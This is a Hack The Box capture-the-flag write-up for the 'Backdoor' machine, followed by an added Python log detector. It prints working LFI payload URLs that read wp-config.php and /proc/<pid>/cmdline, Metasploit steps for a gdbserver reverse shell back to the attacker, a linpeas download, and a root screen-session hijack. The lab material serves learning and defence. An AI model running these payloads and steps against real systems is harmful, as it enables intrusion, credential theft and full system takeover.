Hack The Box::Backdoor

Source: twitter.com/hackthebox_eu/status/1461007660535459845

Information Gathering

First, I use rustscan for port scanning; it saves some time when looking for open ports on the address.

rustscan -a <ip address> -u <value>

The scan shows three open ports: 22, 80 and 1337. Next, I use nmap against each open port to identify the service running on it.

nmap <ip address> -sV -p<port> -T4

Web Enumeration

I use gobuster to enumerate directories on the IP address and find that the website runs on the WordPress CMS.

gobuster dir -u <path> -x <file extension> -t <threads> -w <wordlists>

Next, I confirm that the website runs on WordPress by using whatweb.

whatweb <ip address>

Once that is confirmed, I look for publicly available exploits for this WordPress version using a tool called searchsploit.

searchsploit WordPress <version>

Now I run wpscan in aggressive plugin-detection mode to look for interesting findings in the plugins the website uses.

wpscan --url <path> --api-token <token> --enumerate p,u --plugins-detection aggressive

For your information, the api-token is used to show more details about the vulnerabilities the tool detects. To generate a token, go to this website, register and log in as a free member; from there you can get your own api-token :)

The scan discovered that the website uses the Akismet plugin, with one vulnerability reported, at the path http://10.10.11.125/wp-content/plugins/akismet/

From here, we can browse the path http://10.10.11.125/wp-content/plugins/ and see that an eBook plugin is also present.

http://10.10.11.125/wp-content/plugins/

Now I search for eBook plugin exploits on Exploit-DB and find one here: https://www.exploit-db.com/exploits/39575

From there, we can confirm that a Local File Inclusion vulnerability is present on the website. Let’s try to exploit it.

From this vulnerability:

http://website.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

I replace website.com with the IP address and then access the path.

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

It returns a configuration file that I can download, like this:

The config file contains some credentials; let’s try them to log in to the website.

wp-config.php

WordPress has two login pages, one for the admin and one for the user. I tried to log in through http://10.10.11.125/wp-admin/ and http://10.10.11.125/wp-login/ using the credentials from wp-config.php, but the access is rejected.

http://10.10.11.125/wp-admin/
http://10.10.11.125/wp-login/

From here we know that we can do path traversal, but we don’t know exactly which files are exposed. To find them, I use LFISuite, a Python-based tool for traversing and finding readable files through the vulnerability.

You can get this tool with this command:

git clone https://github.com/D35m0nd142/LFISuite

This tool needs python2.7 and pip for Python 2. Since pip for Python 2 is no longer in the Kali Linux repository, you can download it using these commands:

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output /tmp/get-pip.py

sudo python2 /tmp/get-pip.py

After that you just need to go to the LFISuite directory and type:

python lfisuite.py or python2 lfisuite.py, whichever works

If you hit an error regarding termcolor, you can use this command:

sudo cp /usr/lib/python3/dist-packages/termcolor.py /usr/lib/python2.7/dist-packages

Then you are good to go :)

The result highlighted in red indicates that the path /etc/passwd may contain useful information, so I use Burp Suite to intercept the request and inspect the website’s response for anything useful.

Request
Response

The response has no useful information, so I go back to the other port from the nmap scan. Port 1337 reports waste as its service. I did some quick research on waste and its connection with port 1337 and found this information:

“WASTE is a peer-to-peer and friend-to-friend protocol and software application developed by Justin Frankel at Nullsoft in 2003 that features instant messaging, chat rooms, and file browsing/sharing capabilities”

From that information I find a website about file inclusion penetration testing: https://zsahi.wordpress.com/2018/09/10/file-inclusion/

There, I find that we can brute-force the process ID using this payload:

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/pid/cmdline

In /proc/pid/cmdline, pid can be any value from 1 upwards.

From there, I use a Python script to brute-force the PID from 1 to 1000 and look for anything related to port 1337.

This is the script:

Then this is the result:

From here I can see that PID 851 shows gdbserver running on port 1337. From what I found, gdbserver is a remote debugging server that lets a program be debugged from another machine.
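As an added defender-side example (not from this writeup), here is a small Python log check for the two request patterns used above against filedownload.php: directory traversal in the ebookdownloadurl parameter and the /proc/<pid>/cmdline enumeration. The access-log lines are constructed for the example; the client IPs and timestamps are made up.

```python
"""Detect ebook-download LFI traversal and /proc enumeration in web access logs.

Constructed example: Apache combined-format log lines that mimic the requests
produced by the exploit path described in the writeup.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (client IPs and timestamps are made up).
SAMPLE_LOG = """\
10.10.14.7 - - [16/Nov/2021:10:01:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 2851
10.10.14.7 - - [16/Nov/2021:10:01:09 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1" 200 1816
10.10.14.7 - - [16/Nov/2021:10:02:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/850/cmdline HTTP/1.1" 200 0
10.10.14.7 - - [16/Nov/2021:10:02:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/851/cmdline HTTP/1.1" 200 112
10.10.14.7 - - [16/Nov/2021:10:02:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2Fproc%2F852%2Fcmdline HTTP/1.1" 200 0
192.168.1.20 - - [16/Nov/2021:10:03:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://10.10.11.125/wp-content/uploads/book.pdf HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')
PROC_RE = re.compile(r'^/proc/\d+/')


def classify(path):
    """Return a finding label for one request path, or None if it looks benign."""
    target = parse_qs(urlsplit(path).query).get("ebookdownloadurl", [""])[0]
    target = unquote(unquote(target))  # parse_qs decodes once; catch double-encoding too
    if "../" in target or "..\\" in target:
        return "traversal"
    if PROC_RE.match(target):
        return "proc_read"
    if target.startswith("/"):
        return "absolute_path"
    return None


def analyse(log_text, proc_threshold=3):
    """Return per-IP finding counts and the IPs whose /proc reads reach the threshold."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "/ebook-download/filedownload.php" not in m["path"]:
            continue
        label = classify(m["path"])
        if label:
            counts[m["ip"]][label] += 1
    # A burst of /proc/<pid>/cmdline reads from one client is the PID brute-force pattern.
    enumerating = sorted(ip for ip, c in counts.items() if c["proc_read"] >= proc_threshold)
    return {ip: dict(c) for ip, c in counts.items()}, enumerating
```

Any traversal or /proc hit on this endpoint is worth an alert on its own; the threshold only separates a one-off probe from a PID sweep.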

Exploitation

Now I can use Metasploit to get a reverse shell through gdbserver remote payload execution.

These are the steps for using msfconsole:

  • msfconsole
  • search gdb → select exploit/multi/gdb/gdb_server_exec
  • show options
  • set RHOSTS → target IP
  • set RPORT → 1337
  • set LHOST → OpenVPN from HTB
  • set target 1
  • set payload 5

After doing so, type show options and check if all settings are correct.

When all settings are correct, type run to execute the payload.

Then I type ls to list the current directory on the target server. Here I see a text file named user.txt; maybe I can get the user flag by reading it.

There it is, finally I get the user flag from the machine.

Privilege Escalation

After that, I took a rest for the day, and the next day I tried again with Metasploit to look for a way to escalate privileges.

After repeating the same steps, something caught my attention.

As we can see, there is an additional directory named screen-exploit. This could be a hint for the privilege escalation.

From here, I typed shell to get a shell and whoami to check my privileges.

To be sure, I transferred linpeas.sh from my local machine to the remote server using a tool called updog.

To download the file on the remote server, I need a proper terminal, so I used python3 -c "import pty;pty.spawn('/bin/bash')" to spawn one.

After that, I used wget to download the file.

Now it’s time to run linpeas.

From here, there are 2 things that caught my attention.

As we can see, there is a screen session running as root, visible after I spawned the terminal with the python3 command above.

This finding confirms the screen-exploit hint from before. Following that hint, we can try the screen exploitation with screen -x root/root. This command attaches a running screen session belonging to root to my current terminal.

After that, I need to set my terminal type using the export TERM=xterm command. Then I can run screen -x root/root to attach my terminal to the running root session.

There you go: now I am running as root, where root.txt contains the system flag. Finally, I’ve owned the box.

Thank you for reading my first write up. Sorry if there are any mistakes in the explanation. Hopefully you enjoy reading it and learn more from it.

Have a nice day. Adios \^o^/
